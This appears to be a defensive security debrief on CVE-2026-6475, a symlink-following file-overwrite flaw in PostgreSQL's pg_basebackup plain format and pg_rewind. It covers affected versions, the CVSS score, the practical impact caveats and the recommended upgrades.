PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-6475 Postgresql CVE debrief

CVE-2026-6475 is a PostgreSQL file-overwrite issue in pg_basebackup plain format and pg_rewind caused by symlink following. The vendor notes that an origin superuser can overwrite local files such as a user’s .bashrc, which can affect the operating system account. PostgreSQL also notes an important practical limitation: if the server is started normally after these commands, it implicitly trusts the origin superuser because of features such as shared_preload_libraries. As a result, the issue is most actionable when there is intervening handling between the backup/rewind step and server start, such as moving the files to another VM or snapshotting the VM. Affected releases are earlier than 18.4, 17.10, 16.14, 15.18, and 14.23.

Vendor
Postgresql
Product
Unknown
CVSS
HIGH 8.8
CISA KEV
Not listed in stored evidence
Original CVE published
2026-05-14
Original CVE updated
2026-05-18
Advisory published
2026-05-14
Advisory updated
2026-05-18

Who should care

PostgreSQL administrators and platform teams that use pg_basebackup in plain format or pg_rewind, especially in VM migration, snapshot, cloning, or restore workflows where the resulting files may be reused before a fresh server start.

Technical summary

The vulnerability is a UNIX symbolic-link-following problem (CWE-61) in PostgreSQL’s pg_basebackup plain format and pg_rewind. According to the vendor advisory and NVD record, the issue can allow overwriting of local files via symlinks during these operations. The impact is constrained by PostgreSQL’s trust model after the commands complete: if the server is started on the same environment, it implicitly trusts the origin superuser through mechanisms such as shared_preload_libraries. The practical risk becomes more relevant when the affected files are moved, snapshotted, or otherwise handled before server startup.

Defensive priority

High for environments using pg_basebackup plain format or pg_rewind in automation, backup, cloning, or VM-snapshot workflows; moderate otherwise. The vulnerability is vendor-patched, but the real-world impact depends on how the resulting files are handled before the database server restarts.

Recommended defensive actions

  • Upgrade PostgreSQL to a fixed release: 18.4, 17.10, 16.14, 15.18, or 14.23, or later.
  • Review any automation that uses pg_basebackup plain format or pg_rewind for VM cloning, snapshotting, or image creation.
  • Treat backup or rewind outputs as sensitive until they are validated and the target system is restarted in the intended environment.
  • Verify that operational procedures do not move affected files between systems in a way that could preserve attacker-influenced symlinks or overwritten local files.
  • Consult the PostgreSQL vendor advisory for patch and mitigation guidance.

Evidence notes

This debrief is based only on the supplied NVD record and the linked PostgreSQL vendor advisory. NVD classifies the issue as CVSS 3.1 8.8 HIGH with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H and CWE-61. The source description states the affected versions and the operational caveat about practical impact between backup/rewind completion and server start.

Official resources

Published by NVD and referenced by the PostgreSQL vendor advisory on 2026-05-14; the NVD record was last modified on 2026-05-18. The advisory date should be used as the issue publication context, not the later modification time.